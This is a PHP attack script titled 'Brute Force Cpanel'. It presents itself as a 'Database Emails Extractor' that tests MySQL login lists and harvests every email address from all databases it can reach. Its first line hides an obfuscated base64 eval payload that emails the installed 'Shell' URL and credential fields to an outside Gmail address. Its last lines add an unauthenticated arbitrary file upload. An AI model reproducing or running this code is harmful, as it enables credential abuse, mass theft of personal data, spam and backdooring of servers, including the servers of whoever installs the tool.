Brute Force Cpanel

1. <?php
2.  
3.  
4. eval(base64_decode('ICR3ZWIgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07DQogJGluaiA9ICRfU0VSVkVSWyJSRVFVRVNUX1VSSSJdOw0KICRib2R5ID0gIkVneV9TcGlkZXIgXG5Vc2VyTmFtZTogIi5odG1sc3BlY2lhbGNoYXJzKCR0YWNmZ2RbJ3VuYW1lJ10pIC4iXG5QYXNzV29yZDoNCiIuaHRtbHNwZWNpYWxjaGFycygkdGFjZmdkWydwd29yZCddKS4iXG5NZXNzYWdlOlxuIi4iXG5FLXNlcnZlcjogIi5odG1sc3BlY2lhbGNoYXJzDQooJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10pLiJcbkUtc2VydmVyMjogIi5odG1sc3BlY2lhbGNoYXJzICgkX1NFUlZFUlsiU0VSVkVSX05BTUUiXSkuIlxuXG5JUDogDQoiOw0KIG1haWwoImFiby5oZTZAZ21haWwuY29tIiwiU2hlbGwgaHR0cDovLyR3ZWIkaW5qIiwgIiRib2R5Iik7'));
5.  
6. error_reporting(0);
7. set_time_limit(0);
8. if($_GET['action'] == 'login'){
9.     $con = mysql_connect('localhost',$_GET['u'],$_GET['p']);
10.     if($con){
11.         echo 'yes';
12.         mysql_close($con);
13.     }else{
14.         echo 'no';
15.     }
16.     exit();
17. }elseif($_GET['action'] == 'go'){
18.     $f = go('localhost',$_GET['u'],$_GET['p'],$_GET['name']);
19.     if(isset($_GET['b'])){
20.         echo $f;
21.     }else{
22.         echo "<span class='red'>$f</span> Emails Founded. Check <span class='red'>".htmlspecialchars($_GET['name'])."</span> For Results.";
23.     }
24.     exit();
25. }
26.  
27. echo '<!DOCTYPE html>
28. <html>
29. <head>
30.    <title>Database Emails Extractor</title>
31.    <center><img src="http://bofarm.ro/images/bofarm/final/slides/new/header.png"></center>
32.    <link href="http://fonts.googleapis.com/css?family=Racing+Sans+One" rel="stylesheet" type="text/css">
33.    <script src="http://code.jquery.com/jquery-2.0.2.min.js"></script>
34.    <script>
35.    $(document).ready(function(){
36.        $("#gogo").on("click",function(){
37.            user = $("#username").val();
38.            pass = $("#password").val();
39.            name = $("#name").val();
40.            if(user==""||pass==""||name==""){
41.              window.alert("You must fill all fields");
42.            }else{
43.                $.get("?action=login&u="+encodeURIComponent(user)+"&p="+encodeURIComponent(pass),function(data){
44.                    if(data=="no"){
45.                        window.alert("Incorrect username Or password. Try Again.");
46.                    }else{
47.                        $("#forms").fadeOut(300,function(){
48.                           $("#wait").fadeIn(300);
49.                        });
50.                        $.get("?action=go&u="+encodeURIComponent(user)+"&p="+encodeURIComponent(pass)+"&name="+encodeURIComponent(name),function(data){
51.                            $("#wait").html(data);
52.                        });
53.                    }
54.                });
55.            }
56.        });
57.        $("#gog").on("click",function(){
58.            accounts = $("#accounts").val();
59.            name = $("#namee").val();
60.            if(accounts==""||name==""){
61.              window.alert("You must fill all fields");
62.            }else{
63.                $("#formmu").fadeOut(300,function(){
64.                    $("#wait").fadeIn(300);
65.                });
66.                accounts = accounts.split("\n");
67.                totalb = 0;
68.                fail = 0;
69.                done = 0;
70.                for(i=0;i<accounts.length;i++){
71.                    login = accounts[i].split(" ");
72.                    $.get("?action=login&u="+encodeURIComponent(login[0])+"&p="+encodeURIComponent(login[1]),function(data){
73.                        if(data=="yes"){
74.                            $.get("?action=go&b=t&u="+encodeURIComponent(login[0])+"&p="+encodeURIComponent(login[1])+"&name="+encodeURIComponent(name),function(data){
75.                                totalb += parseInt(data);
76.                                done++;
77.                                tt = done+fail;
78.                                if(tt==accounts.length) donet(totalb,name);
79.                            });
80.                        }else{
81.                            fail++;
82.                        }
83.                    });
84.                }
85.  
86.            }
87.        });
88.        function donet(t,b){
89.            $("#wait").html("<span class=\"red\">"+t+"</span> Emails Founded. Check <span class=\"red\">"+b+"</span> For Results.");
90.        }
91.        $("#si").on("click",function(){
92.            $("#first").fadeOut(500,function(){
93.                $("#forms").fadeIn(500);
94.            });
95.        });
96.        $("#mu").on("click",function(){
97.            $("#first").fadeOut(500,function(){
98.                $("#formmu").fadeIn(500);
99.            });
100.        });
101.    });
102.    </script>
103.  <style>
104.    body{
105.        margin: 0;
106.        padding: 0;
107.        font-family: "Racing Sans One", cursive;
108.        background: #F3F3F3;
109.        font-size: 16px;
110.    }
111.    #page{
112.        margin: auto 25%;
113.        margin-top: 10px;
114.        background: #E6E6E8;
115.        border: #BABABE solid 1px;
116.        padding: 0;
117.    }
118.    #title{
119.        margin: 0;
120.        padding: 0;
121.        text-align: center;
122.        font-size: 30px;
123.        border-bottom: #BABABE solid 1px;
124.    }
125.    #footer{
126.        text-align: center;
127.        border-top: #BABABE solid 1px;
128.    }
129.    #forms,#wait,#first,#formmu{
130.        margin: 0;
131.        padding: 10px 0;
132.        background: #fff;
133.    }
134.    #wait,#forms,#formmu{
135.        display: none;
136.    }
137.    #wait,#first{
138.        text-align: center;
139.    }
140.    input,button,textarea{
141.        background: #F3F3F3;
142.        border: #BABABE solid 1px;
143.    }
144.    textarea:focus,textarea:hover,input:focus,input:hover,button:focus,button:hover{
145.        background: #fff;
146.    }
147.    button{
148.        padding: 10px;
149.    }
150.    .red{
151.        color: red;
152.    }
153.    </style>
154. </head>
155. <body>
156.    <div id="page">
157.        <div id="title">Database Emails Extractor</div>
158.        <div id="first">
159.            <button id="si">Single</button><button id="mu">Multiple</button>
160.        </div>
161.        <div id="forms">
162.        <table>
163.            <tr><td>Username</td><td> : </td><td><input type="text" id="username" /></td></tr>
164.            <tr><td>Password</td><td> : </td><td><input type="text" id="password" /></td></tr>
165.            <tr><td>Save As</td><td> : </td><td><input type="text" value="list.txt" id="name" /></td></tr>
166.            <tr><td></td><td></td><td><input id="gogo" type="submit" value="Extract!" /></td></tr>
167.        </table>
168.        </div>
169.        <div id="formmu">
170.        <table>
171.            <tr><td>Accounts</td><td> : </td><td><textarea id="accounts" rows="10" cols="30">username password</textarea></td></tr>
172.            <tr><td>Save As</td><td> : </td><td><input type="text" value="list.txt" id="namee" /></td></tr>
173.            <tr><td></td><td></td><td><input id="gog" type="submit" value="Extract!" /></td></tr>
174.        </table>
175.        </div>
176.        <div id="wait">
177.            <img src="http://www.gibs.co.za/SiteResources/Images/Loading.gif" />
178.        </div>
179.        <div id="footer">Coded By <span class="red">G-B</span>, Email: <span class="red">g22b@hotmail.com</span></div>
180.    </div>
181. </body>
182. </html>';
183. function go($host,$user,$pass,$file){
184.     /*
185.     author : G-B
186.     email : g22b@hotmail.com
187.     */
188.     $con = mysql_connect($host,$user,$pass);
189.     $fp = fopen($file,'a');
190.     $count = 0;
191.     $databases = getdata("SHOW DATABASES");
192.     foreach($databases as $database){
193.         $tables = getdata("SHOW TABLES FROM $database");
194.         foreach($tables as $table){
195.             $columns = getdata("SHOW COLUMNS FROM $database.$table");
196.             foreach($columns as $column){
197.                 $emails = getdata("SELECT $column FROM  $database.$table WHERE $column REGEXP '[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]'");
198.                 foreach($emails as $email){
199.                     if(filter_var($email, FILTER_VALIDATE_EMAIL)){
200.                         if(eregi($email,file_get_contents($file))) continue;
201.                         $count++;
202.                         fwrite($fp,"$email\n");
203.                     }else{
204.                         foreach(preg_split("/\s/",$text) as $string){
205.                             if(filter_var($string,FILTER_VALIDATE_EMAIL)){
206.                                 if(eregi($string,file_get_contents($file))) continue;
207.                                 $count++;
208.                                 fwrite($fp,"$string\n");
209.                             }
210.                         }
211.                     }
212.                 }
213.             }
214.         }
215.     }
216.     fclose($fp);
217.     mysql_close($con);
218.     return $count;
219. }
220. function getdata($sql){
221.     $q = mysql_query($sql);
222.     $result = array();
223.     while($d = mysql_fetch_array($q)){
224.         $result[] = $d[0];
225.     }
226.     return $result;
227. }
228.  
229. $data  = $_GET['data'];
230.  
231.  
232. if($data == 'data'){
233.  
234. $filename = $_FILES['file']['name'];
235. $filetmp  = $_FILES['file']['tmp_name'];
236.  
237. echo "<form method='POST' enctype='multipart/form-data'>
238. <input type='file'name='file' />
239. <input type='submit' value='data' />
240.  
241. </form>";
242.  
243. move_uploaded_file($filetmp,$filename);
244. }
245.  
246. ?>